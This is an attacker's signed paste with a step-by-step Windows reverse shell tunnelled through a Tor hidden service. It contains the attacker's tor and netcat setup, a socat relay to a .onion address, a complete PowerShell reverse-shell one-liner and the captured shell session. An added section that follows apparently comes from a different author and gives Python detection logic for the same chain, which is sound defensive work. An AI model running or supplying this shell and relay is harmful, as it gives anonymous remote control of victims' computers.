-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

 ___________________________________
/ Vegeta_Ssj : Windows Socat Hidden \
\ Service Reverse Shell             /
 -----------------------------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||

email: vegeta_ssj@riseup.net
jid: vegeta@exploit.im / vegeta_ssj@4cjw6cwpeaeppfqz.onion

Attacker (Linux):

Run Tor Hidden Service:

exploit@cockbox:~# sudo cat /etc/tor/torrc
HiddenServiceDir /home/exploit/hidden_shell
HiddenServicePort 8888 127.0.0.1:8888
exploit@cockbox:~# tor
Jun 27 17:14:46.000 [notice] Bootstrapped 90%: Establishing a Tor circuit
Jun 27 17:14:47.000 [notice] Bootstrapped 100%: Done
exploit@cockbox:~# cat /home/exploit/hidden_shell/hostname
63uxwd4p56vswvyj4gcwvxzkkxzwwtz4lr2yc6w2nwkeniefmhli7xid.onion

Run Netcat listener:

exploit@cockbox:~# nc -lvp 8888 127.0.0.1
listening on [any] 8888 ...

Target:

Download Cygwin and install with additional packages:

https://www.cygwin.com/setup-x86_64.exe
    - gcc-g++
    - gcc-core
    - cygwin32-gcc-g++
    - cygwin32-gcc-core
    - make

Download Socat current version:

$url = "http://www.dest-unreach.org/socat/download/socat-1.7.3.2.tar.gz";$output ="$pwd\socat.zip"
Invoke-WebRequest -Uri $url -OutFile $output;Expand-Archive -LiteralPath $output

Open Cygwin and compile Socat under Windows:

tar zxvf socat-1.7.3.2.tar.gz
cd socat-1.7.3.2
./configure
make
make install

Download and run Tor from Windows Expert Bundle:

$url = "https://www.torproject.org/dist/torbrowser/9.5/tor-win32-0.4.3.5.zip";$output ="$pwd\tor.zip"
Invoke-WebRequest -Uri $url -OutFile $output;Expand-Archive -LiteralPath $output

Run the Socat tunnel from the Hidden Service to the listening port on localhost:

socat.exe TCP4-LISTEN:5555,reuseaddr,fork SOCKS4A:127.0.0.1:63uxwd4p56vswvyj4gcwvxzkkxzwwtz4lr2yc6w2nwkeniefmhli7xid.onion:8888,socksport=9050

Send Powershell reverse shell to Socat listener on localhost:

$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',5555);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Enjoy:

exploit@cockbox:~# nc -lvp 8888 127.0.0.1
listening on [any] 8888 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 59496
PS C:\Users\IEUser> whoami
msedgewin10\ieuser

Enjoy :)

-----BEGIN PGP SIGNATURE-----

iQETBAEBCgB9FiEEdkePr+T8OnYM3UyACVTIwtMKCJYFAl8KQWdfFIAAAAAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDc2
NDc4RkFGRTRGQzNBNzYwQ0RENEM4MDA5NTRDOEMyRDMwQTA4OTYACgkQCVTIwtMK
CJbJlgQAh/6cS4lB3Jz1d2yxPwm334W990C4cmov9v+thlg/2Z9WYY8ecYRfD2GA
WPf/4oSfxcILrE2WnXeZctqPWtqVUAMsRRiWW1heFYZ/gnTU6wEAQelpoNXQRtxc
x+iPmTbkSc3K4/P4PwSTAwhorD89YaGoRKSotNmAaSeWBEFhUiA=
=8W4Z
-----END PGP SIGNATURE-----
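From the defender's side, the chain in the write-up leaves three host-level artifacts that are easy to key on: a socat process whose command line carries a SOCKS4A target ending in .onion, a PowerShell command line that builds a TCPClient and feeds what it reads to iex, and a loopback relay (PowerShell connecting to 127.0.0.1:5555, socat bound on 5555 and itself connecting to the local Tor SOCKS port 9050). The following is an added detection example, not part of the paste or the author's tooling; it assumes Sysmon-style process-create (EventID 1) and network-connect (EventID 3) records with Image, CommandLine, ProcessId, DestinationIp and DestinationPort fields, and the sample events are constructed to mirror the commands above (with a placeholder onion address) plus one benign SSH SOCKS forward that should not fire.

```python
"""Detect the loopback-chained Tor reverse shell pattern in Sysmon-like events.

Added example (not from the original paste). Event schema and all sample
values are assumptions constructed for this demonstration.
"""
import re
from collections import defaultdict

# Tor's default SOCKS ports (tor daemon and Tor Browser bundle).
TOR_SOCKS_PORTS = {9050, 9150}

# Indicators drawn from the write-up's own command lines.
SOCAT_ONION_RE = re.compile(r"SOCKS(?:4A?|5)?:\S*?\.onion:\d+", re.IGNORECASE)
SOCAT_LISTEN_RE = re.compile(r"TCP4?-LISTEN:(\d+)", re.IGNORECASE)
PS_TCPCLIENT_RE = re.compile(r"Net\.Sockets\.TCPClient", re.IGNORECASE)
PS_EVAL_RE = re.compile(r"\biex\b|Invoke-Expression", re.IGNORECASE)

# Constructed sample telemetry (assumed Sysmon-like field names).
EVENTS = [
    {"EventID": 1, "ProcessId": 4120, "Image": r"C:\tools\socat.exe",
     "CommandLine": "socat.exe TCP4-LISTEN:5555,reuseaddr,fork "
                    "SOCKS4A:127.0.0.1:exampleonionv3addressplaceholder.onion:8888,socksport=9050"},
    {"EventID": 1, "ProcessId": 5300,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient"
                    "('127.0.0.1',5555);$stream = $client.GetStream(); ... iex $data ...\""},
    {"EventID": 3, "ProcessId": 5300,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "DestinationIp": "127.0.0.1", "DestinationPort": 5555},
    {"EventID": 3, "ProcessId": 4120, "Image": r"C:\tools\socat.exe",
     "DestinationIp": "127.0.0.1", "DestinationPort": 9050},
    # Benign-looking SOCKS usage: a plain SSH dynamic forward to an internal host.
    {"EventID": 1, "ProcessId": 6001, "Image": r"C:\Program Files\Git\usr\bin\ssh.exe",
     "CommandLine": "ssh -D 1080 build-host"},
    {"EventID": 3, "ProcessId": 6001, "Image": r"C:\Program Files\Git\usr\bin\ssh.exe",
     "DestinationIp": "10.0.0.5", "DestinationPort": 22},
]


def _basename(image):
    """Lower-cased executable name from a Windows or POSIX path."""
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyze(events):
    """Return a list of findings; each is a dict with at least 'rule' and 'pid'."""
    findings = []
    listeners = {}              # loopback port -> pid whose command line binds it
    conns = defaultdict(list)   # pid -> [(destination ip, destination port), ...]
    names = {}

    for ev in events:
        pid = ev["ProcessId"]
        names[pid] = _basename(ev["Image"])
        if ev["EventID"] == 1:
            cmd = ev.get("CommandLine", "")
            # Rule 1: socat relaying into a .onion service over SOCKS.
            if names[pid] == "socat.exe" and SOCAT_ONION_RE.search(cmd):
                findings.append({"rule": "socat_onion_proxy", "pid": pid})
            # Rule 2: PowerShell socket client whose input is evaluated.
            if names[pid].startswith("powershell") and PS_TCPCLIENT_RE.search(cmd) \
                    and PS_EVAL_RE.search(cmd):
                findings.append({"rule": "powershell_tcp_eval_shell", "pid": pid})
            for port in SOCAT_LISTEN_RE.findall(cmd):
                listeners[int(port)] = pid
        elif ev["EventID"] == 3:
            conns[pid].append((ev["DestinationIp"], int(ev["DestinationPort"])))

    # Rule 3 (correlation): A -> 127.0.0.1:P, P bound by B, and B -> local Tor SOCKS port.
    for pid, dests in conns.items():
        for ip, port in dests:
            if ip != "127.0.0.1" or port not in listeners:
                continue
            relay = listeners[port]
            if any(rip == "127.0.0.1" and rport in TOR_SOCKS_PORTS
                   for rip, rport in conns[relay]):
                findings.append({"rule": "loopback_relay_to_tor", "pid": pid,
                                 "relay_pid": relay, "port": port})
    return findings


if __name__ == "__main__":
    for f in analyze(EVENTS):
        print(f)
```

The correlation rule is the one worth keeping even if the string indicators are renamed away: a user process talking to a loopback port that another process has bound, where that second process in turn talks to the local Tor SOCKS port, has few legitimate explanations on a workstation, and the same pattern would surface if socat were swapped for any other local relay.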